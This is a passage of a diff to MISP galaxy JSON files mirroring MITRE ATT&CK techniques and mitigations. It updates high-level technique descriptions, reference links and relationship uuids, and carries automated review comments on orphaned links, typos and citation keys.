"https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2",
"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207",
"https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in",
@@ -27268,7 +27618,6 @@
"refs": [
"http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf",
"https://attack.mitre.org/techniques/T1056/001",
- "https://capec.mitre.org/data/definitions/568.html",
"https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
]
},
@@ -27300,13 +27649,13 @@
],
"refs": [
"http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf",
- "http://www.sixdub.net/?p=367",
"https://attack.mitre.org/techniques/T1059/001",
"https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/",
"https://github.com/jaredhaight/PSAttack",
"https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/",
- "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx",
+ "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367",
+ "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
]
},
@@ -27377,7 +27726,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1027/003",
- "https://capec.mitre.org/data/definitions/636.html",
"https://en.wikipedia.org/wiki/Duqu",
"https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
]
@@ -27500,12 +27848,7 @@
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
]
},
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "type": "subtechnique-of"
- }
- ],
+ "related": [],
"uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
"value": "Launchd - T1053.004"
},
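Review bot: emptying `related` removes the `subtechnique-of` edge from "Launchd - T1053.004" to 35dd844a-b219-4e2b-a6bb-efa9a75995a9, but the cluster itself stays, and nothing in this hunk marks it as deprecated or revoked. A sub-technique ID with no parent is what consumers will now see; either add whatever deprecation marker the galaxy format supports, or state in the commit message why the parent link goes away so the orphan is understood as intentional.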
@@ -28018,18 +28361,17 @@
"https://attack.mitre.org/techniques/T1583/001",
"https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
"https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html",
- "https://capec.mitre.org/data/definitions/630.html",
"https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/",
"https://threatconnect.com/blog/infrastructure-research-hunting/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-258a",
"https://us-cert.cisa.gov/ncas/tips/ST05-016",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
+ "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/",
"https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/",
"https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf",
"https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
- "https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/",
"https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/"
]
},
@@ -28043,7 +28385,7 @@
"value": "Domains - T1583.001"
},
{
- "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)",
+ "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)",
"meta": {
"external_id": "T1584.001",
"kill_chain": [
@@ -28061,6 +28403,7 @@
"https://attack.mitre.org/techniques/T1584/001",
"https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover",
"https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/",
+ "https://unit42.paloaltonetworks.com/domain-shadowing/",
"https://www.icann.org/groups/ssac/documents/sac-007-en"
]
},
@@ -28231,7 +28574,7 @@
"value": "Malware - T1588.001"
},
{
- "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+ "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). ",
"meta": {
"external_id": "T1589.001",
"kill_chain": [
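Review bot: the replacement T1589.001 description ends with a trailing space inside the JSON string (`...[Valid Accounts](https://attack.mitre.org/techniques/T1078)). "`), which is harmless to parsers but will churn on the next regeneration if anyone hand-trims it. Content-wise the new MFA/OTP sentence cites `(Citation: Okta Scatter Swine 2022)` and the matching `https://sec.okta.com/scatterswine` entry is added in the following refs hunk, so the citation resolves.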
@@ -28246,6 +28589,7 @@
"https://github.com/dxa4481/truffleHog",
"https://github.com/michenriksen/gitrob",
"https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/",
+ "https://sec.okta.com/scatterswine",
"https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/",
"https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196",
"https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/",
@@ -28307,7 +28651,6 @@
"refs": [
"http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion",
"https://attack.mitre.org/techniques/T1542/003",
- "https://capec.mitre.org/data/definitions/552.html",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
]
},
@@ -28459,7 +28802,7 @@
"value": "Tool - T1588.002"
},
{
- "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
+ "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
"meta": {
"external_id": "T1583.004",
"kill_chain": [
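Review bot: the added sentence in the T1583.004 description reads "Adversaries may use web servers to support support watering hole operations", a doubled "support". This is upstream ATT&CK text and the mirror should not diverge from it, but it is worth reporting upstream rather than silently carrying it.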
@@ -28534,7 +28877,6 @@
"https://adsecurity.org/?p=2293",
"https://attack.mitre.org/techniques/T1558/003",
"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/",
- "https://capec.mitre.org/data/definitions/509.html",
"https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1",
"https://msdn.microsoft.com/library/ms677949.aspx",
"https://redsiege.com/kerberoast-slides",
@@ -28581,7 +28923,38 @@
"value": "Serverless - T1583.007"
},
{
- "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+ "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) \n\nMalvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. 
This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) ",
+ "meta": {
+ "external_id": "T1583.008",
+ "kill_chain": [
+ "mitre-attack:resource-development"
+ ],
+ "mitre_data_sources": [
+ "Internet Scan: Response Content"
+ ],
+ "mitre_platforms": [
+ "PRE"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1583/008",
+ "https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e",
+ "https://www.bbc.com/news/technology-12891182",
+ "https://www.ic3.gov/Media/Y2022/PSA221221",
+ "https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/",
+ "https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0458aab9-ad42-4eac-9e22-706a95bafee2",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "155207c0-7f53-4f13-a06b-0a9907ef5096",
+ "value": "Malvertising - T1583.008"
+ },
+ {
+ "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.",
"meta": {
"external_id": "T1584.004",
"kill_chain": [
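Review bot: the T1583.008 description appears split across two physical lines, with the continuation ("This infection vector may therefore remain hidden...") lacking the `+` prefix. The hunk header `+28923,38` only adds up if that continuation is the same source line as the one before it, so this looks like display wrapping rather than a raw newline in the string, but confirm the committed JSON contains `\n` there like the other paragraph breaks in the same value; a literal newline would make the file invalid JSON and the hunk unapplyable. The companion change to the T1584.004 description (adding "or email servers to support Phishing operations") mirrors the wording added to T1583.004 above, which keeps the two server sub-techniques consistent.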
@@ -29141,7 +29514,6 @@
"refs": [
"http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf",
"https://attack.mitre.org/techniques/T1014",
- "https://capec.mitre.org/data/definitions/552.html",
"https://en.wikipedia.org/wiki/Rootkit",
"https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/",
"https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"
@@ -29324,7 +29696,6 @@
"refs": [
"http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf",
"https://attack.mitre.org/techniques/T1036",
- "https://capec.mitre.org/data/definitions/177.html",
"https://lolbas-project.github.io/",
"https://twitter.com/ItsReallyNick/status/1055321652777619457"
]
@@ -29893,7 +30264,7 @@
"value": "DNSCalc - T1324"
},
{
- "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.",
+ "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)",
"meta": {
"external_id": "T1566",
"kill_chain": [
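Review bot: two citation keys in the new T1566 text are malformed: "spoofing(Citation: Proofpoint-spoof)" has no space before the citation, and "download malware,(Citation: sygnia Luna Month)" spells the key "Luna Month" while the later key is "Unit42 Luna Moth" and the added sygnia URL is `luna-moth-false-subscription-scams`. Both are upstream text, so the mirror should keep them, but they deserve an upstream report since keys that do not match the reference they point at defeat citation lookup.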
@@ -29915,9 +30286,15 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1566",
- "https://capec.mitre.org/data/definitions/98.html",
+ "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends",
+ "https://blog.sygnia.co/luna-moth-false-subscription-scams",
"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide",
- "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"
+ "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa23-025a",
+ "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf",
+ "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/",
+ "https://www.proofpoint.com/us/threat-reference/email-spoofing"
]
},
"uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
@@ -29953,5 +30330,5 @@
"value": "Keychain - T1579"
}
],
- "version": 24
+ "version": 25
}
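Review bot: the version bump to 25 is the only signal a consumer gets for this change, which also adds a new cluster (Malvertising - T1583.008), removes a sub-technique parent edge (Launchd - T1053.004), swaps several live links for web.archive.org snapshots and drops the CAPEC references; a short changelog line listing those would make the bump meaningful.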
diff --git a/clusters/mitre-course-of-action.json b/clusters/mitre-course-of-action.json
index e78f3c3..9434f17 100644
--- a/clusters/mitre-course-of-action.json
+++ b/clusters/mitre-course-of-action.json
@@ -22,15 +22,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8b36d944-f274-4d46-9acd-dbba6927ce7a",
"value": "Registry Run Keys / Startup Folder Mitigation - T1060"
},
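Review bot: emptying `related` on "Registry Run Keys / Startup Folder Mitigation - T1060" removes its only relationship (the `mitigates` edge to 9422fc14-1c43-410d-ab0f-a709b76c72dc), and the next two hunks do the same for T1041 and T1011. These legacy technique-named mitigations then remain in the file as clusters with `"related": []` and nothing else pointing at them; if upstream revoked those relationships, say so in the commit message, and consider whether the generator should drop orphaned mitigation clusters instead of keeping empty shells.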
@@ -43,15 +35,7 @@
"https://attack.mitre.org/mitigations/T1041"
]
},
- "related": [
- {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "92c28497-2820-445e-9f3e-a03dd77dc0c8",
"value": "Exfiltration Over Command and Control Channel Mitigation - T1041"
},
@@ -65,15 +49,7 @@
"https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/"
]
},
- "related": [
- {
- "dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a98be93b-a75b-4dd4-8a72-4dfd0b5e25bb",
"value": "Exfiltration Over Other Network Medium Mitigation - T1011"
},
@@ -100,13 +76,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"tags": [
@@ -135,13 +104,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -149,13 +111,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"tags": [
@@ -205,6 +160,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"tags": [
@@ -219,13 +181,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5",
"tags": [
@@ -275,13 +230,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -303,13 +251,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "79a47ad0-fc3b-4821-9f01-a026b1ddba21",
"tags": [
@@ -318,7 +259,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
+ "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
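Review bot: the `-7d6f590f-544b-45b4-9a42-e0805f342af3` / `+7b50a1d3-4ca7-45d1-989d-a6503f04bfe1` pair reads as an in-place retarget of a `mitigates` edge, but since the list is uuid-sorted it may equally be one removal and one unrelated insertion that happen to share a line. Either way, check that 7b50a1d3... exists as a technique in the attack-pattern cluster after this same change and that 7d6f590f... is revoked, because the `almost-certain` tag is carried over unchanged to whatever the new target is.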
@@ -345,13 +286,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "808e6329-ca91-4b87-ac2d-8eadc5f8f327",
"tags": [
@@ -394,13 +328,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
"tags": [
@@ -429,20 +356,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8",
"tags": [
@@ -485,13 +398,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d376668f-b208-42de-b1f5-fdfe0ad4b753",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d456de47-a16f-4e46-8980-e67478a12dcb",
"tags": [
@@ -555,27 +461,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
"tags": [
@@ -624,6 +509,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "19bf235b-8620-4997-b5b4-94e0659ed7c3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "28abec6c-4443-4b03-8206-07f2e264a6b4",
"tags": [
@@ -632,14 +524,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
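Review bot: read as a net change this hunk adds 435dfb86-2697-4867-85b5-2fef496c0517 and removes 51dea151-0898-4a45-967c-3ebee0420484, while 4f9ca633 only shifts position; the diff shows two substitutions because the list is kept sorted (28abec6c < 435dfb86 < 4f9ca633, so ordering is fine). 51dea151 is also dropped from another cluster earlier in the patch, so its removal is consistent; 435dfb86 is a new target and should be checked against the attack-pattern galaxy like the other inserted uuids.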
@@ -673,20 +565,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
"tags": [
@@ -739,15 +617,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
